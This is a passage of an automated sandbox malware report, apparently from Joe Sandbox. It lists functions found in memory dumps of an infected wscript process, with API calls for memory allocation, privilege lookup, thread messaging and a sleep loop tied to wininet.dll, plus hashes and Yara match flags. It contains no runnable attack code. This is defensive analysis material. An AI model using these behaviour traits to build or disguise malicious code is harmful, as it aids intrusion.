                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction ID: 818777a63a75c95fae6c85831726c7ff98adb195d8c0574ffa75a5f39797a94b
                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction Fuzzy Hash: A6F0A4B2200208AFCB14DF89DC81EEB77ADEF8C754F158248BA1D97241D630E8518BA0
                                            Function 0091A53A Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00902D11,00002000,00003000,00000004), ref: 0091A579
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b440f8bb9d8363535c7513422f90b0563e122b49a6642ac6239811c06e011424
                                            • Instruction ID: c6c479625b4f0b288c2fc8b74116bf14ab6a3b6b6a3a4e527410df240d18a316
                                            • Opcode Fuzzy Hash: b440f8bb9d8363535c7513422f90b0563e122b49a6642ac6239811c06e011424
                                            • Instruction Fuzzy Hash: 8CF0F8B2200218AFDB14DF88DC85EE777ADEF88754F158249FE0997241C630E811CBA0
                                            Function 0091A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00902D11,00002000,00003000,00000004), ref: 0091A579
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction ID: 32e73026d83071328f3216130e5ca74bc52b97411d13c6ab2fc31f4d2a898c47
                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction Fuzzy Hash: B4F015B2200208AFCB14DF89CC81EEB77ADEF88754F118148BE0897241C630F811CBA0
                                            Function 0091A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00914D50,?,?,00914D50,00000000,FFFFFFFF), ref: 0091A4B5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction ID: 2e7e5cbb505dfa10c6df4f23e206c91d9ae52f55c17413313c3d226b120a1068
                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction Fuzzy Hash: E3D012752002186BD710EB98CC45FD7776CEF44760F154455BA1C5B242C530F90086E0
                                            Function 04DA2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: fa0965fcdc668d7156c43af158704345a0affc55ed5bac59a578ef5b2c4ee7b1
                                            • Instruction ID: 57a8689cfde6579f07c3a95296a71336a2975fd1f4e13610207a033a73b97be5
                                            • Opcode Fuzzy Hash: fa0965fcdc668d7156c43af158704345a0affc55ed5bac59a578ef5b2c4ee7b1
                                            • Instruction Fuzzy Hash: 1490023120140442F2007598580868600198BE0305F55D011B5436665ECA65D9917571
                                            Function 04DA2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 51226eb29ce4232a705c9ae51a4cc8dc70d7ba390ea29a8d8c8292f2b2b47156
                                            • Instruction ID: 68640c823db5561f60b43d09bbf9276782c2efdc0b492169cb43b1bbbee27b01
                                            • Opcode Fuzzy Hash: 51226eb29ce4232a705c9ae51a4cc8dc70d7ba390ea29a8d8c8292f2b2b47156
                                            • Instruction Fuzzy Hash: 8490023120148842F2107158880478A00198BD0305F59C411B4836768D8A95D9917561
                                            Function 04DA2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8d0d2589460e5f17e958e6b45211a49daa2af9b3479cbe8baa43a8ff788430ac
                                            • Instruction ID: 9a8c5a97be5d95272240df605faf9972517c16cebf706cedc2dee46e7f3b80bd
                                            • Opcode Fuzzy Hash: 8d0d2589460e5f17e958e6b45211a49daa2af9b3479cbe8baa43a8ff788430ac
                                            • Instruction Fuzzy Hash: 3590023120140882F20071584804B8600198BE0305F55C016B0536764D8A15D9517961
                                            Function 04DA2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 63b2e3d2be9babe9c20e5a0ec495d2f194ba79139835f2c9c1f084c42d031e18
                                            • Instruction ID: 47a0ed4be8d40b69c5d978fcd2c377f40bf103d83c69986d765d81401499a85d
                                            • Opcode Fuzzy Hash: 63b2e3d2be9babe9c20e5a0ec495d2f194ba79139835f2c9c1f084c42d031e18
                                            • Instruction Fuzzy Hash: 45900221242441927645B1584804547401A9BE0245795C012B1826A60C8926E956EA61
                                            Function 04DA2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d8a24fb4a080172de846e2c5d253a11a9f6ee74ae8f28fa260c5f2fba066f657
                                            • Instruction ID: f11c78f6cec5c06acb4757a49eb696143a8e357c3ab1e83f62f7ae1480000fc1
                                            • Opcode Fuzzy Hash: d8a24fb4a080172de846e2c5d253a11a9f6ee74ae8f28fa260c5f2fba066f657
                                            • Instruction Fuzzy Hash: A690023120140453F21171584904747001D8BD0245F95C412B0836668D9A56DA52B561
                                            Function 04DA2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f77b0702986b6df3dfa41c32dd15af9299acb6fad6913ea56a1ab51a4fd1917d
                                            • Instruction ID: 9183c6fc977752e081353bb0ff51176589d8d52d3f586e803dcb804e8db85510
                                            • Opcode Fuzzy Hash: f77b0702986b6df3dfa41c32dd15af9299acb6fad6913ea56a1ab51a4fd1917d
                                            • Instruction Fuzzy Hash: F590022921340042F2807158580864A00198BD1206F95D415B0427668CCD15D9696761
                                            Function 04DA2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 62be31fad21be0928957d8c1faef7a765a5bdaef2ad212dc447e18cd7a353779
                                            • Instruction ID: 9573b60dc5f2f0980167eacd4802740b39adc06727c55706b69c5513b4291c07
                                            • Opcode Fuzzy Hash: 62be31fad21be0928957d8c1faef7a765a5bdaef2ad212dc447e18cd7a353779
                                            • Instruction Fuzzy Hash: 0E90027120140442F2407158480478600198BD0305F55C011B5476664E8A59DED57AA5
                                            Function 04DA2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3e581adfab10ea6aef2e13155ebd61ffb2e59c6ccde02a6f8696b8360a605dc0
                                            • Instruction ID: 4d36324844a28efcfe4df9262898bff449184c1e481f7230cc2e8e6724eb5747
                                            • Opcode Fuzzy Hash: 3e581adfab10ea6aef2e13155ebd61ffb2e59c6ccde02a6f8696b8360a605dc0
                                            • Instruction Fuzzy Hash: 19900221211C0082F30075684C14B4700198BD0307F55C115B0566664CCD15D9616961
                                            Function 04DA2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1deca70078323baa47959c2ade2f72f0d93c37318429857c197ebac31bd84d58
                                            • Instruction ID: d428c1f54c55325e6498e4adb9f0e8671001bc823d5bee5531803295905d5333
                                            • Opcode Fuzzy Hash: 1deca70078323baa47959c2ade2f72f0d93c37318429857c197ebac31bd84d58
                                            • Instruction Fuzzy Hash: 7A90026134140482F20071584814B460019CBE1305F55C015F1476664D8A19DD527566
                                            Function 04DA2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3caece7f50f354e36744c3c702bbc523888ae52511a4858886d1e9151df0d936
                                            • Instruction ID: afee7e8394257c2cbfda82e001961554c3a746c78104857718caa282e0b1b41c
                                            • Opcode Fuzzy Hash: 3caece7f50f354e36744c3c702bbc523888ae52511a4858886d1e9151df0d936
                                            • Instruction Fuzzy Hash: 31900225211400432205B5580B04547005A8BD5355355C021F1427660CDA21D9616561
                                            Function 04DA2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d268b0a3db8901defa20994e000556a39692e95c7a900ae667e43cf553faae75
                                            • Instruction ID: 27a22512140e2ddaca55c56e85de96125d24dd4cfff9b7b29301ead579374c7e
                                            • Opcode Fuzzy Hash: d268b0a3db8901defa20994e000556a39692e95c7a900ae667e43cf553faae75
                                            • Instruction Fuzzy Hash: 9C90023120140842F2807158480468A00198BD1305F95C015B0437764DCE15DB597BE1
                                            Function 04DA2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5c56d55dfa65b840535921be9e03c9d71bb94eff18ff980003119effe78c40f7
                                            • Instruction ID: f13604f54df5ece040f8e50785e1d66fda16189215528131955c5cb487b0fc7c
                                            • Opcode Fuzzy Hash: 5c56d55dfa65b840535921be9e03c9d71bb94eff18ff980003119effe78c40f7
                                            • Instruction Fuzzy Hash: E990023120544882F24071584804A8600298BD0309F55C011B04767A4D9A25DE55BAA1
                                            Function 04DA2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b8c17d1a487a073ad1cf48a87b6cd60f2272e29dfc9c2f6b4474023f379abb23
                                            • Instruction ID: d5b8d3517d76a3d4dc852672644fa3d3e4f24caa830cff659e14a9522b83dd8c
                                            • Opcode Fuzzy Hash: b8c17d1a487a073ad1cf48a87b6cd60f2272e29dfc9c2f6b4474023f379abb23
                                            • Instruction Fuzzy Hash: A890026120240043620571584814656401E8BE0205B55C021F14266A0DC925D9917565
                                            Function 04DA35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d200ca16b7e5d84da9676828f6beec193c7832333bf064ac0c649f3577243c74
                                            • Instruction ID: 7bb5d0b11aff30bc3e1ea5a426da799a83fda902ad01c4292cc5b93e8661a5ed
                                            • Opcode Fuzzy Hash: d200ca16b7e5d84da9676828f6beec193c7832333bf064ac0c649f3577243c74
                                            • Instruction Fuzzy Hash: 9A90023160550442F2007158491474610198BD0205F65C411B0836678D8B95DA5179E2
                                            Function 00919080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 403 919080-9190c2 call 91bd40 406 9190c8-919118 call 91be10 call 90acf0 call 914e50 403->406 407 91919c-9191a2 403->407 414 919120-919131 Sleep 406->414 415 919133-919139 414->415 416 919196-91919a 414->416 417 919163-919184 call 918eb0 415->417 418 91913b-919161 call 918ca0 415->418 416->407 416->414 422 919189-91918c 417->422 418->422 422->416
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 00919128
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: a1b7492857a8a25a3984b9832b8bf1e51afe202f6f4feea2de0658650f7e27fc
                                            • Instruction ID: 3fee06c6c6faf6eac4bac7556c1c083b3f5ad9ab8dc04a8e27b2db53d52d79a2
                                            • Opcode Fuzzy Hash: a1b7492857a8a25a3984b9832b8bf1e51afe202f6f4feea2de0658650f7e27fc
                                            • Instruction Fuzzy Hash: 403192B6600345BBC714DF64C885FA7B7B9FB88B00F10851DF62A5B245D634B590CBA4
                                            Function 00919077 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 423 919077-91907e 424 919080-9190c2 call 91bd40 423->424 425 9190b8-9190c2 423->425 426 9190c8-919118 call 91be10 call 90acf0 call 914e50 424->426 427 91919c-9191a2 424->427 425->426 425->427 436 919120-919131 Sleep 426->436 437 919133-919139 436->437 438 919196-91919a 436->438 439 919163-919184 call 918eb0 437->439 440 91913b-919161 call 918ca0 437->440 438->427 438->436 444 919189-91918c 439->444 440->444 444->438
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 00919128
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 510424261553a1b9c7de418b5567af4783c3a207718fb0a9146054819cc32162
                                            • Instruction ID: ddce92423b06e7c776df1914110ff49eca34eba286cc5b46b2a81d45356f57c0
                                            • Opcode Fuzzy Hash: 510424261553a1b9c7de418b5567af4783c3a207718fb0a9146054819cc32162
                                            • Instruction Fuzzy Hash: 4E31D7B5604309BBC714DF64D885FA7B7B8FB48700F10841DFA196B246D774B590CBA5
                                            Function 0091A662 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 562 91a662-91a686 563 91a68c-91a6a1 RtlFreeHeap 562->563 564 91a687 call 91af60 562->564 564->563
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00903AF8), ref: 0091A69D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 50b8b6e3fb2bc093772f9f7fa2b78ec8ee602d7a6e2afe77da654bec77ad4846
                                            • Instruction ID: 359524888ef00c870433ba5316ef8ee645e9d976461984bc85b852b86b2370ea
                                            • Opcode Fuzzy Hash: 50b8b6e3fb2bc093772f9f7fa2b78ec8ee602d7a6e2afe77da654bec77ad4846
                                            • Instruction Fuzzy Hash: E8E092B1200104BFDB14DFA4CC44EE73B69EF88750F118658F91C97382C531E915CAB0
                                            Function 0091A670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 565 91a670-91a6a1 call 91af60 RtlFreeHeap
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00903AF8), ref: 0091A69D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction ID: 0f27f675b57322ffe51042605258716101f4a0bb6b3235a15880c44e7820645e
                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction Fuzzy Hash: 55E012B1200208ABDB18EF99CC49EA777ACEF88760F118558BA085B242C630E9108AB0
                                            Function 00908310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0090836A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0090838B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                            • Instruction ID: b543ce92e9c6cce32c75bcbe7a1e0bccfdc92bd146fd6034f5fb65654d0ec4ae
                                            • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                            • Instruction Fuzzy Hash: 22018F72A8032C7AE721A6949C43FFE776C6B80F50F050118FF04BA1C2EAA4690646E6
                                            Function 0091A775 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0090F1D2,0090F1D2,?,00000000,?,?), ref: 0091A800
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: e475f961fa8a3ddf69cecf4ca0a6ed047704cab10902e3674a58d89db69f5878
                                            • Instruction ID: 13f8471df22115810612886fd0a217c6adadf70395af93f2995cd30acaf0a3a1
